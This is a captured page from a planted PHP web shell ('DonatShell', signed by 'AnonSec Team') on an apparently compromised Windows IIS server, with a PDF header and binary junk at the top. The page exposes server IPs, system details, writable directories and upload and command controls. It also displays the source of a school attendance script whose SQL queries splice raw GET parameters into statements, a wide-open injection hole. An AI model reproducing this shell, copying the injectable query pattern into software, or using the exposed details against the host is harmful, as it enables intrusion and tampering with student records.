%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : 122.154.253.140  /  Your IP : 216.73.216.34
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/inetpub/wwwroot/mis/teacher/subject_score_v2/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C:/inetpub/wwwroot/mis/teacher/subject_score_v2//SaveArrive.php
<?PHP
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); // Date in the past
header("Last-Modified: " . date("D, d M Y H:i:s") . " GMT");
header("Cache-Control: no-cache, must-revalidate"); // HTTP/1.1
header("Pragma: no-cache");
include("conf.php");
//echo $_GET["i"];
//echo $_GET['PLevel'];
$sql = "select * from TBStudent where IDStudent='" . $_GET['IDStudent'] . "'";
//echo $sql; exit();
$stmt = sqlsrv_query($conn, $sql);
if ($stmt === false) {
    die(print_r(sqlsrv_errors(), true));
}
while ($row = sqlsrv_fetch_array($stmt, SQLSRV_FETCH_ASSOC)) {
    $PLevel = $row['PLevel'];
}
$sql = "select AYear,Term,FieldWeek from TBStudentArriveWeek where '" . $_GET['DT'] . "' > dateStart and '" . $_GET['DT'] . "'<= DateEnd and PLevelID=" . $PLevel;
//echo $sql; exit();
$stmt = sqlsrv_query($conn, $sql);
if ($stmt === false) {
    die(print_r(sqlsrv_errors(), true));
}
while ($row = sqlsrv_fetch_array($stmt, SQLSRV_FETCH_ASSOC)) {
    $FieldWeek = $row['FieldWeek'];
    $AYear = rtrim($row['AYear']);
    $Term = rtrim($row['Term']);
}
if ($FieldWeek == "") {
    echo "<font color='red'>ไม่มีข้อมูลสัปดาห์ ในวันที่ที่เลือก</font> (week not found)";
    exit();
}
$sql = "select * from TBStudentArriveDate where RegYear='" . $AYear . "' and RegTerm='" . $Term . "' and PSubjectCode='" . iconv("utf-8", "tis-620", $_GET['PSubjectCode']) . "' and IDStudent='" . $_GET['IDStudent'] . "' and DateStr='" . $_GET['DT'] . "'";
//echo $sql; exit();
$params = array();
$options =  array("Scrollable" => SQLSRV_CURSOR_KEYSET);
$stmt = sqlsrv_query($conn, $sql, $params, $options);
$row_count = sqlsrv_num_rows($stmt);
if ($row_count > 0) {
    $sql = "delete from TBStudentArriveDate where   RegYear='" . $AYear . "' and RegTerm='" . $Term . "' and PSubjectCode='" . iconv("utf-8", "tis-620", $_GET['PSubjectCode']) . "' and IDStudent='" . $_GET['IDStudent'] . "' and DateStr='" . $_GET['DT'] . "'";
    $stmt = sqlsrv_query($conn, $sql);
    if ($stmt === false) {
        echo "<font color='red'>ผิดพลาด ไม่สามารถบันทึกข้อมูลได้</font> (2) \nDetail : \n";
        die(print_r(sqlsrv_errors(), true));
    }
}
$sql = "insert into TBStudentArriveDate(RegYear,RegTerm,PSubjectCOde,IDStudent,DateStr,DateDT,ValueWeek,ValueStr) values  ('" . $AYear . "','" . $Term . "','" . iconv("utf-8", "tis-620", $_GET['PSubjectCode']) . "','" . $_GET['IDStudent'] . "','" . $_GET['DT'] . "','" . $_GET['DT'] . "','" . rtrim($FieldWeek) . "','" . iconv("utf-8", "tis-620", $_GET['ArrID']) . "')";
//echo $sql;  exit();
$stmt = sqlsrv_query($conn, $sql);
if ($stmt === false) {
    die(print_r(sqlsrv_errors(), true));
}


$sql = "select * from TBStudentArriveDate where IDStudent='" . $_GET['IDStudent'] . "'  and PSubjectCode='" . iconv("utf-8", "tis-620", $_GET['PSubjectCode']) . "' and ValueWeek='" . $FieldWeek . "' order by DateStr";
//echo $sql; exit();
$stmt = sqlsrv_query($conn, $sql);
if ($stmt === false) {
    die(print_r(sqlsrv_errors(), true));
}
while ($row = sqlsrv_fetch_array($stmt, SQLSRV_FETCH_ASSOC)) {
    $data = $data . "" . rtrim($row['ValueStr']);
}

$sql = "update TBStudentArrive set " . $FieldWeek . "= '" . $data . "'  where IDStudent='" . $_GET['IDStudent'] . "'  and PSubjectCode='" . iconv("utf-8", "tis-620", $_GET['PSubjectCode']) . "' ";
// echo $sql;
// exit();
$stmt = sqlsrv_query($conn, $sql);
if ($stmt === false) {
    echo "<font color='red'>ผิดพลาด ไม่สามารถบันทึกข้อมูลได้</font> (3)";
    die(print_r(sqlsrv_errors(), true));
} else {
    echo "<font color='green'>บันทึกเสร็จสมบูรณ์...</font>";
}
    /*
    $sql = "update TBStudentArrive set ".rtrim($FieldWeek)." = isnull(rtrim(".rtrim($FieldWeek) ."),'') + '".iconv("utf-8","tis-620",$_GET['ArrID'])."' where RegYear='". $AYear."' and RegTerm='".$Term."' and PSubjectCode='".iconv("utf-8","tis-620",$_GET['PSubjectCode'])."' and IDStudent='".$_GET['IDStudent']."'";
    //$sql = "update TBStudentArrive set W_7 = 'X' where RegYear='2562' and RegTerm='1' and IDStudent='23347'";
    //echo $sql." -------------- "; // exit(); 
    $stmt = sqlsrv_query( $conn, $sql );
	if( $stmt === false) {
        echo "<font color='red'>ผิดพลาด ไม่สามารถบันทึกข้อมูลได้</font> (1) \nDetail : \n";
		die( print_r( sqlsrv_errors(), true) );
	} else {
        $sql = "select * from TBStudentArriveDate where RegYear='".$AYear."' and RegTerm='".$Term."' and PSubjectCode='".iconv("utf-8","tis-620",$_GET['PSubjectCode'])."' and IDStudent='".$_GET['IDStudent']."' and DateStr='".$_GET['DT']."'";
        //echo $sql; exit();
        $params = array();
        $options =  array( "Scrollable" => SQLSRV_CURSOR_KEYSET );
        $stmt = sqlsrv_query( $conn, $sql , $params, $options );
        $row_count = sqlsrv_num_rows( $stmt );
        if($row_count > 0) {
            $sql = "delete from TBStudentArriveDate where   RegYear='".$AYear."' and RegTerm='".$Term."' and PSubjectCode='".iconv("utf-8","tis-620",$_GET['PSubjectCode'])."' and IDStudent='".$_GET['IDStudent']."' and DateStr='".$_GET['DT']."'";
            $stmt = sqlsrv_query( $conn, $sql );
            if( $stmt === false) {
                echo "<font color='red'>ผิดพลาด ไม่สามารถบันทึกข้อมูลได้</font> (2) \nDetail : \n";
                die( print_r( sqlsrv_errors(), true) );
            }
        } 
        $sql = "insert into TBStudentArriveDate(RegYear,RegTerm,PSubjectCOde,IDStudent,DateStr,DateDT,ValueWeek,ValueStr) values  ('".$AYear."','".$Term."','".iconv("utf-8","tis-620",$_GET['PSubjectCode'])."','".$_GET['IDStudent']."','".$_GET['DT']."','".$_GET['DT']."','".rtrim($FieldWeek)."','".iconv("utf-8","tis-620",$_GET['ArrID'])."')";
        //echo $sql; exit();
        $stmt = sqlsrv_query( $conn, $sql );
        if( $stmt === false) {
            echo "<font color='red'>ผิดพลาด ไม่สามารถบันทึกข้อมูลได้</font> (3)";
            die( print_r( sqlsrv_errors(), true) );
        } else { 
            echo "<font color='green'>บันทึกเสร็จสมบูรณ์...</font>";
        }
    
    }  
    */

Anon7 - 2022
AnonSec Team